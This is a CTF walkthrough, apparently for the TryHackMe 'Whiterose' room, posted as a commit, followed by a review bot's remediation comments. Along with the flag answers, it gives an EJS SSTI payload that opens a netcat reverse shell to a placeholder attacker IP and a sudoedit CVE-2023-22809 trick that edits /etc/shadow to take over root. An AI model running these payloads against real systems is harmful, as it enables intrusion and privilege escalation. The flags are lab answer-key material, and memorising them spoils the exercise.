Whiterose
IDOR on website's messages revealed admin pass
EJS SSTI exploit (mde/ejs#735)
CVE-2023-22809: Sudoedit Bypass
s0m312 authored Nov 6, 2024
0 parents commit 0ccf309
Showing 1 changed file with 28 additions and 0 deletions.
28 changes: 28 additions & 0 deletions Whiterose
@@ -0,0 +1,28 @@
Q: What's Tyrell Wellick's phone number?
A: 842-029-5701
1) nmap scan shows, port 22 and 80 are open
2) navigate to port 80 via browser, shows domain cyprusbank.thm (add to /etc/hosts)
3) cyprusbank.thm didnt show much, so with gobuster vhost found subdomain admin.cyprusbank.thm (add to /etc/hosts)
4) creds that was given "Olivia Cortez:olivi8" worked there.
5) navigate to "messages" and at url can be seen http://admin.cyprusbank.thm/messages/?c=5 , tryed to lower the parameter 'c' and at 0 it showed "Gayle Bev":"p~]P@5!6;rs558:q"
6) logged in as Gayle Bev and phones numbers can be seen.

Q: User flag?
A: THM{4lways_upd4te_uR_d3p3nd3nc!3s}
1) after entering as Gayle Bev, the 'settings' tab on the site can be accessable.
2) via burp-suite repeater I've played abit with the request, and it doesnt actually changes the user's password, so i tryed to delete the parameter of 'password' and it reveals some embeded js files (EJS).
3) Via google, found SSTI for EJS, and the payload looked like this: (had to use BusyBox since my nc and target's nc didnt match verions and without it, i couldnt execute commands)
name=1&settings[view options][client]=true&settings[view options][escapeFunction]=1;return global.process.mainModule.constructor._load('child_process').execSync('busybox nc <IP> 1234 -e /bin/sh');
4) logged in as user 'web' and it had the flag in hes home dir.

Q: root flag?
A: THM{4nd_uR_p4ck4g3s}
1) upgraded shell via python3 and stty raw...
2) sudo -l , revealed the user can execute without pass this:
sudoedit /etc/nginx/sites-available/admin.cyprusbank.thm
3) searched exploit for sudoedit 1.9.12p1, found this usefull:
https://www.vicarius.io/vsociety/posts/cve-2023-22809-sudoedit-bypass-analysis
4) export EDITOR="nano -- /etc/shadow"
5) (on my kali) openssl passwd -6 <new pass for root>
6) run "sudoedit /etc/nginx/sites-available/admin.cyprusbank.thm"
7) replaced root's password and did 'su root' (with my new pass)
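Review bot: the walkthrough records what was done at each step but not why it worked or what would have prevented it, and that context is missing from all three tasks. In step 5 of the first task the commit title names the bug class (IDOR) but the note itself does not: the `c` parameter in `/messages/?c=5` is accepted without an ownership check, and a sentence saying so, plus the fix (authorize the record against the logged-in user server-side), would make the finding reusable. In step 3 of the second task the payload depends on `settings[view options][escapeFunction]` being settable from the request; record the EJS version found on the box so the reference to mde/ejs#735 can be matched against it, and note that the user flag text itself ("4lways_upd4te_uR_d3p3nd3nc!3s") is the remediation. In steps 2 through 7 of the third task the bypass relies on `sudoedit` honouring the `--` in `EDITOR="nano -- /etc/shadow"` on sudo 1.9.12p1 (CVE-2023-22809); state that the fix is a patched sudo rather than leaving the reader to infer it from the link. Two style points: the `<IP>` placeholder in the payload is good and should be called out as such, and the Q/A blocks would read more easily with one heading per task and the numbered steps separated from the answer line; "tryed", "verions", "accessable", "embeded" and "hes" are typos.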
